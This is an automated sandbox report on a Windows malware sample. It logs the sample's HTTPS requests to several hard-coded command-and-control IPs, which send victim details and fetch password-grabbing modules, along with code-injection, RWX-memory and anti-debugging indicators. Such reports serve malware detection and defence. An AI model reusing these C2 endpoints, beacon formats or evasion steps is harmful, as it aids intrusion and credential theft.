suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/NpdHNRhrX33vnXV5x9jz/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/exc/E:%200xc0000005%20A:%200x0000000076F99A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/user/test22/0/

Performs some HTTP requests (30 events)

request	GET http://api.ipify.org/?format=text
request	GET https://179.189.229.254/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/5tIdKd9BQcw97tDkWQXFcV8GHmRSS/
request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/exc/E:%200xc0000005%20A:%200x0000000076F99A5A/0/
request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/user/test22/0/
request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5Cwise-toolsPXDT3N%5Cpzggi8w3183a1077e104d07a84291d0d5dcc1dexl.grf/0/
request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://105.27.205.34/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/pwgrabb64/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/etAeSjeTCe4jkQuDOjlUTHW/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/exc/E:%200xc0000005%20A:%200x0000000076F99A5A/0/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/user/test22/0/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/10/62/OJLELJAKUDUGHFR/7/
request	GET https://105.27.205.34/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/pwgrabc64/
request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/DerGZwL4ua1lDPww283xhhhGVTl48hJ/
request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/exc/E:%200xc0000005%20A:%200x0000000076F99A5A/0/
request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/user/test22/0/
request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/MDFwQcZzmEtnaC9hhuhJDWmvxuDF/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/10/62/TFOWOHKHTBS/7/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/10/62/KBIJKZGVIOLLRWL/7/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/23/100019/
request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/DNSBL/listed/0/
request	GET https://184.74.99.214/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
request	GET https://184.74.99.214/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/NpdHNRhrX33vnXV5x9jz/
request	GET https://184.74.99.214/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/exc/E:%200xc0000005%20A:%200x0000000076F99A5A/0/
request	GET https://184.74.99.214/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/user/test22/0/

Allocates read-write-execute memory (usually to unpack itself) (20 events)

Time & API	Arguments	Status	Return
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10059000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fe1000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fc1000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f50000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e61000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73db1000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e62000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x743a1000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 233472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f21000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f01000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 278528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00510000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff		3221225496
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00531000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 region_size: 163840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02070000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000002a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\cmd.exe
cmdline	C:\Windows\system32\svchost.exe

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 5, 2021, 9:41 a.m.	process_identifier: 828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00561000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 5, 2021, 9:34 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0004e000', u'virtual_address': u'0x0005d000', u'entropy': 7.012284815479608, u'name': u'.rsrc', u'virtual_size': u'0x0004d080'}

entropy

7.01228481548

description

A section with a high entropy has been found

entropy

0.458823529412

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 5, 2021, 9:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (24 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (8 events)

Time & API	Arguments	Status
NtTerminateProcess Aug. 5, 2021, 9:41 a.m.	status_code: 0x00000000 process_identifier: 2180 process_handle: 0x00000118
NtTerminateProcess Aug. 5, 2021, 9:41 a.m.	status_code: 0x00000000 process_identifier: 2180 process_handle: 0x00000118	1
NtTerminateProcess Aug. 5, 2021, 9:35 a.m.	status_code: 0x00000000 process_identifier: 2956 process_handle: 0x000000000000041c
NtTerminateProcess Aug. 5, 2021, 9:35 a.m.	status_code: 0x00000000 process_identifier: 2956 process_handle: 0x000000000000041c	1
NtTerminateProcess Aug. 5, 2021, 9:35 a.m.	status_code: 0x00000000 process_identifier: 2284 process_handle: 0x0000000000000440
NtTerminateProcess Aug. 5, 2021, 9:35 a.m.	status_code: 0x00000000 process_identifier: 2284 process_handle: 0x0000000000000440	1
NtTerminateProcess Aug. 5, 2021, 9:35 a.m.	status_code: 0x00000000 process_identifier: 200 process_handle: 0x0000000000000440
NtTerminateProcess Aug. 5, 2021, 9:35 a.m.	status_code: 0x00000000 process_identifier: 200 process_handle: 0x0000000000000440	1

Communicates with host for which no DNS query was performed (6 events)

host	105.27.205.34
host	128.201.76.252
host	179.189.229.254
host	184.74.99.214
host	46.99.175.217
host	65.152.201.203

Allocates execute permission to another process indicative of possible code injection (50 out of 711 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000090000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000000a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 790528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
